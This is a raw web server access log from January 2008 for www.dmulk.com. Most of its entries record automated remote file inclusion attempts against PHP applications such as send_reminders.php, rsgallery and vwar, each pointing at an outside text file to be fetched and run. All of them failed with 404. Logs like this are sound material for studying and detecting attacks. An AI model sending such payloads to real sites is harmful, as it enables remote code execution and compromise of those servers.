87.106.46.84 - - [03/Jan/2008:03:22:16 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:03:22:16 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:03:22:17 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:22:49 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:22:50 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:22:50 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.74.111 - - [03/Jan/2008:03:25:31 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
69.94.74.111 - - [03/Jan/2008:03:25:35 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:26:24 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:26:24 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:26:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.196.176 - - [03/Jan/2008:03:26:36 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.javva.com/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:28:35 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:28:35 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:28:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:29:04 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:29:08 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:29:08 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:29:08 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:29:10 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:29:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:29:13 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:29:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:29:18 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:29:18 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.221 - - [03/Jan/2008:03:29:18 -0800] "GET /tools/ HTTP/1.0" 200 12388 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:29:18 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:29:19 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:29:19 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:29:19 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:29:20 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.191.23.34 - - [03/Jan/2008:03:29:29 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.kosca.net/bbs/skin/zero_vote/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.23.34 - - [03/Jan/2008:03:29:29 -0800] "GET /logs/config.php?path_to_root=http://www.kosca.net/bbs/skin/zero_vote/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:03:29:45 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:03:29:46 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:03:29:46 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.252.72 - - [03/Jan/2008:03:30:05 -0800] "GET /logs/access_071018.log/Neos_Chronos/header.php?base_folder=http://www.multiplan.pl/images/stories/appdata/groups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:30:12 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:30:13 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:30:14 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:30:47 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:30:48 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:30:48 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.27.203.44 - - [03/Jan/2008:03:32:04 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.44 - - [03/Jan/2008:03:32:05 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.44 - - [03/Jan/2008:03:32:05 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.136 - - [03/Jan/2008:03:32:48 -0800] "GET /plans/?D=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:35:27 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.123 - - [03/Jan/2008:03:36:14 -0800] "GET /logs/access_071016.log HTTP/1.0" 200 46965 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:38:15 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:38:16 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:38:16 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:06 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:06 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:06 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:06 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:06 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:06 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:06 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:06 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:07 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:07 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:07 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:41:07 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:42:02 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:42:03 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:42:03 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.139 - - [03/Jan/2008:03:42:52 -0800] "GET /minamijewelry/kanji1.psd HTTP/1.0" 200 515148 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:44:09 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:44:09 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:44:09 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.244.66 - - [03/Jan/2008:03:45:35 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.66 - - [03/Jan/2008:03:45:36 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.66 - - [03/Jan/2008:03:45:36 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.66 - - [03/Jan/2008:03:46:29 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.76.110.169 - - [03/Jan/2008:03:46:46 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.76.110.169 - - [03/Jan/2008:03:46:51 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.76.110.169 - - [03/Jan/2008:03:46:51 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.76.110.169 - - [03/Jan/2008:03:48:20 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:49:55 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://armax.zoomshare.com/files/indo/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:49:55 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://armax.zoomshare.com/files/indo/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [03/Jan/2008:03:49:56 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://armax.zoomshare.com/files/indo/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:53:13 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:53:13 -0800] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:53:13 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:53:26 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:53:27 -0800] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:53:27 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:53:36 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:54:37 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:54:38 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:54:39 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:54:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:54:40 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:54:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:54:42 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:54:43 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:54:43 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:55:16 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:55:17 -0800] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:55:17 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:55:27 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:55:27 -0800] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:03:55:27 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:57:03 -0800] "GET /logs/access_071220.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:57:03 -0800] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:57:04 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:03:57:49 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:03:57:50 -0800] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:03:57:50 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:03:58:03 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:03:58:03 -0800] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:03:58:04 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"